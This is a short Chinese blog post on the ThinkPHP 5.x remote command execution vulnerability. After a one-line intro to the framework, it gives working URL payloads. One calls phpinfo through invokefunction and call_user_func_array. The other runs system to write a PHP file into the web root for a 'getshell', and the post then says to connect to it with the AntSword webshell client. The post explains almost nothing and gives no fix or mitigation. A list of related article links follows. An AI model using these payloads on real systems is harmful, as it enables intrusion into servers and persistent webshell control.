常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
智云软件测评服务4 天前
测评机构如何通过漏扫保障软件安全?扫描范围与局限解析
渗透·漏洞·扫描
Think Spatial 空间思维7 天前
【安全攻防与漏洞】HTTPS中的常见攻击与防御
网络协议·安全·https·漏洞·攻防·防御
kp0000013 天前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
智云软件测评服务16 天前
系统漏洞扫描服务:维护网络安全的关键与服务原理?
漏洞·扫描·潜在
huohuopro18 天前
thinkphp模板文件缺失没有报错/thinkphp无法正常访问控制器
后端·thinkphp
智云软件测评服务25 天前
主机漏洞扫描:如何保障网络安全及扫描原理与类型介绍?
漏洞·主机·扫描
智云软件测评服务1 个月前
数字化时代下,软件测试中的渗透测试是如何保障安全的?
渗透·测试·漏洞
ybdesire1 个月前
Jinja2模板引擎SSTI漏洞
网络·人工智能·安全·web安全·大模型·漏洞·大模型安全
汤米粥2 个月前
FastAdmin和thinkPHP学习文档
学习·thinkphp·fastadmin
掘金归海一刀2 个月前
thinkphp6+elementui实现多图片压缩包下载
前端·vue.js·thinkphp